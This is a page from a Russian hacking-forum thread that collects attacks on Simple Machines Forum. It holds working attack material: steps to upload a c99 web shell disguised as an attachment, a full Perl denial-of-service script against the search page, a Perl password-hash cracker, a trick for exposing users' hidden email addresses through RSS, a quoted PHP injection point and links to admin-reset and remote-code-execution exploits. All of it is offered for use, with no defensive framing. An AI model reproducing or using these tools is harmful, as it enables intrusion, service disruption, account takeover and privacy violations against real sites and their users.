Форум АНТИЧАТ - [Обзор уязвимостей Simple Machines Forum]

Страница 2 из 5

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - [Обзор уязвимостей Simple Machines Forum] (https://forum.antichat.xyz/showthread.php?t=46567)

cash$$$

16.07.2008 00:16

SMForum audio Captcha Breaking

Цитата:

Сообщение от Sharingan

что можно сделать с пропатченой 1.1.2?
.спасибо

Существует уязвимость из-за слабой реализации звуковой капчи. В этом движке звуковая капча реализуется посредством посылания браузеру
звукового фала в формате WAV, файл создается путем склеивания произвольным
образом нескольких файлов с разными звуками, и служит преградой от
автоматической регистрации новых пользователей.
разработчики включили рандомизацию выходящего WAV файла в
скрипте /Sources/Subs-Sound.php но она явно недостаточна, и легко обходится
перебором байтов по заданным шаблонам звуков

Код:

[blah@localhost smfh]$ ./captcha.pl http://localhost/smf/ 

nnrbv 

created in 1.41827201843262 seconds 

[andrey@localhost smfh]$ ./captcha.pl http://localhost/smf/ 

vpubu 

created in 1.49515509605408 seconds 

[andrey@localhost smfh]$ ./captcha.pl http://localhost/smf/ 

ntfhh 

created in 2.31928586959839 seconds 

[andrey@localhost smfh]$ ./captcha.pl http://localhost/smf/ 

egudz 

created in 0.823321104049683 seconds

как видно перебор составляет всего одну - две секунды. Так же, существует возможность выполнения произвольного PHP кода при создании или
редактировании сообщения форума.

baltazar

23.07.2008 14:05

SMF Upload Shell in Attachment

В старых версиях SMF /attachments не закрыт через .htaccess (или если не настроен mod_rewrite апача)

1) Если шифрование имени файла отключено, то:
берем шелл(я пользовался с99) и переиминовываем его в c99.php.zip
(не ложим в архив,а просто переиминовываем)
Теперь загружаем его как аттачмент в любом посте
Шелл искать в:

Код:

http://[target]/[path]/attachments/c99.php.zip

2) Из админки.
Идем в:
Forum->Attachments and Avatars
Добавляем php:
Allowed attachment extensions: jpg,php
Отключаем шифрование имени:
Encrypt stored filenames: [ ]

Далее аналогично 1) за исключением переименования.

ShAnKaR

23.07.2008 19:24

smf 1.1.2-1.1.3 php injection

Да, да это я про :

Цитата:

2. PHP injection

There is a possibility to execute any PHP code during creation or
editing of forum message.
(no further details is given by advisory author).

в общем времени достаточно прошло чтобы все было уже пропатчено , так что выкладывается в паблик )
файлик Sources/Subs-Post.php

PHP код:


		
			
 // Make sure all tags are lowercase.



            $parts[$i] = preg_replace('~\[([/]?)(list|li|table|tr|td)([^\]]*)\]~e', '"[$1" . strtolower("$2") . "$3]"', $parts[$i]);

baltazar

24.07.2008 11:08

SMF 1.1.4 Search DOS

Код:

#!/usr/bin/perl

use IO::Socket;

print q{

.____ ________ .__ ________________

| | \_____ \__ __ ____ | | / _____/ __ \

| | _(__ < \/ // __ \| | ______ / __ \\____ /

| |___ / \ /\ ___/| |__ /_____/ \ |__\ \ / /

|_______ \/______ /\_/ \___ >____/ \_____ / /____/

\/ \/ \/ \/

_______ _______ _______ ______ _______ _______

( ____ \( )( ____ \ ( __ \ ( ___ )( ____ \

| ( \/| () () || ( \/ | ( \ )| ( ) || ( \/

| (_____ | || || || (__ | | ) || | | || (_____

(_____ )| |(_)| || __) | | | || | | |(_____ )

) || | | || ( | | ) || | | | ) |

/\____) || ) ( || ) | (__/ )| (___) |/\____) |

\_______)|/ \||/ (______/ (_______)\_______)

/**********************************************************\

| SMF 1.1.4 Search DOS |

| |Petros| |

| www.fallen-empires.com |

| www.l3vel-69.net |

\**********************************************************/

};

$rand=rand(10);

print "Forum Host: ";

$serv = <stdin>;

chop ($serv);

print "Path To Search2: ";

$path = <stdin>;

chop ($path);

print "Times To Search: ";

$times = <stdin>;

chop ($times);



for ($i=0; $i<$times; $i++)

{



$quiry="l3vel69-".$rand.$i;

$form = "search=1234567899876544321&submit=Search&advanced=0";



$len = length $form;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Can't Connect Host, it may be ddos'ed already.";

print $get1 "POST ".$path." HTTP/1.0\n";

print $get1 "Host: ".$serv."\n";

print $get1 "Content-Type: application/x-www-form-urlencoded\n";

print $get1 "Content-Length: ".$len."\n\n";

print $get1 $form;

syswrite STDOUT, "69";

}

print "Forum should be Dosed. Check it out...if not use a higher search\n";

mailbrush

25.07.2008 13:01

SMF 1.1.5 Password Cracker

Код:

#!/usr/bin/perl

#

# Simple Machines Forum v1.1.4/v1.1.5 password hash cracker

# not some hack tool you kid. 

# Quickly coded, feel free to improve

#

# Iron

# http://www.randombase.com

# or better: http://www.perlforums.org

#

use Digest::SHA1 'sha1_hex';

print "

Simple Machines Forum v1.1.4/v1.1.5 password hash cracker

by Iron - http://www.randombase.com / http://www.perlforums.org



Menu..

1. Numeric attack

2. Alphabetic attack or whatever

3. Mix 'em up Johnny

4. Dictionary attack

< Choice > ";

chomp($c=<stdin>);

print "[+]Username of the target: ";

chomp($u=lc(<stdin>));

print "[+]Password hash of the target: ";

chomp($p=<stdin>);

print "[+]Cracking... could take a while";

if($c eq '1')

{

        numeric();

}

elsif($c eq '2')

{

        alpha();

}

elsif($c eq '3')

{

        mix();

}

elsif($c eq '4')

{

        dict();

}



sub numeric

{

        $i = 0;

        while(sha1_hex($u.$i) ne $p){$i++;}

        print "\n[+]Sweet! Found the password: ".$i;

}

sub alpha

{

        for($i = "a";$i ne "zzzzzzz" && sha1_hex($u.$i) ne $p;$i++){}

        print "\n[+]Sweet! Found the password: ".$i;

}

sub mix

{

        print "Not finished. Yet.";

}

sub dict # needs some cleaning to make it faster

{

        print "\n[+]I'll need a dictionary though, care to give its filename? ";

        chomp($dict=<stdin>);

        open(d,"<".$dict);

        $found = 0;

        while(($line = <d>))

        {

                chomp($line);

                if(sha1_hex($u.$line) eq $p)

                {

                        print "[+]Sweet! Found the password: ".$line;

                        $found = 1; next;

                }

        }

                if(!$found)

                {

                        print "[-]Not sweet. I couldn't find the password in your dictionary.";

                }

}

mailbrush

09.08.2008 18:17

Узнаем мыло пользователя Smf (любая версия) через Rss

Узнаем мыло пользователя SMF (любая версия) через RSS

Вот нашел небольшой баг в SMF, позволяющий узнать мыльник юзера SMF. Например ты смотришь профайл какого-то юзера, и видишь: E-mail: скрытый. Так вот, ты можешь узнать его мыло!

Для чего это надо?
Это уже в ваших целях.

Итак, начнем. Качаем любой браузер, который поддерживает чтение RSS новостей; я использую Opera. Переходим на наш форум, и видим в строке адреса:

http://s56.radikal.ru/i152/0808/8f/efbcb4c14897.jpg

Нас интересует то, что возле стрелки. Это и есть подписка на новости. Т.е. если на форуме кто-то напишет сообщение, оно сразу же появиться в меню "Каналы новостей".

После нажатия на значок RSS, ждем порядка 10 секунд, и видим:

http://s58.radikal.ru/i161/0808/55/974e4027e6b6.jpg

Жмем "Да". Видим, у нас появилась меню "Каналы новостей", кликаем по нему, выбираем название форума. Все, теперь осталось только ждать, когда кто-то напишет сообщение.

Написал? - Можете радоваться. Видим это:

http://s42.radikal.ru/i095/0808/d9/49dba1e96bcd.jpg

Вот и все, ребята. Используйте мыло в своих целях.

PS: Прошу строго не судить, так как эт мое первое творение.

Elekt

01.09.2008 20:17

Криптографическая атака на Smf

Криптографическая атака на SMF
Заслуживает внимания.

_http://forum.antichat.ru/thread81052.html

[Raz0r]

07.09.2008 12:57

Simple Machines Forum <= 1.1.5 Admin Reset Password Exploit (win32)

Смена пароля любого пользователя в SMF <=1.1.5

Обнаружил уязвимость, которая позволяет сменить пароль любому пользователю форума, в том числе администратору, через систему восстановления пароля, не имея доступа к почтовому ящику атакуемого пользователя. Она возможна благодаря предсказуемости кода подтверждения для смены пароля, который генерируется с помощью функции rand().
Уязвимость актуальна, если веб-приложение установлено на платформе win32.

http://milw0rm.com/exploits/6392

TANZWUT

05.10.2008 11:18

http://milw0rm.com/exploits/6665

Цитата:

Name: SMF 1.1.6 Filter Post Bypass
Author: WHK
WebSite: http://www.jccharry.com/

en{
The data in a post are not filtered properly when someone enters
statements BBCode wrong without content that a user can enter
words banned by the system of restrictions by allowing expose
SPAM content, and so on.
}

es{
Los datos en un post no son filtrados adecuadamente cuando alguien
ingresa declaraciones bbcode sin contenido probocando que un
usuario pueda ingresar palabras prohibidas por el sistema de
restricciones permitiendo exponer contenido SPAM, etc.
}

Example of a post / Ejemplo de un post:

------------------------------------------------------------------
[*color=red][*size=20pt]Fu[*url][*/url]ck you admin![*/size][*/color]

My SPAM: [*b]ht[*b][*/b]tp://www.jc[*i][*/i]charry.com/[*/b] >:D
------------------------------------------------------------------

Demo:
http://www.jccharry.com/archivos_publicos/smf_filter_post_bypass.png

[Raz0r]

05.11.2008 21:59

Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
Автор: Charles FOL

Загрузка gzip-архива с валидным модулем SMF, содержащим шелл, через атачменты форума,
а затем непреднамеренная установка этого модуля администратором с помощью CSRF-уязвимости (тэг [img])

http://real.olympe-network.com/releases/19817

Время: 00:35

Страница 2 из 5

Показывать 40 сообщений этой темы на одной странице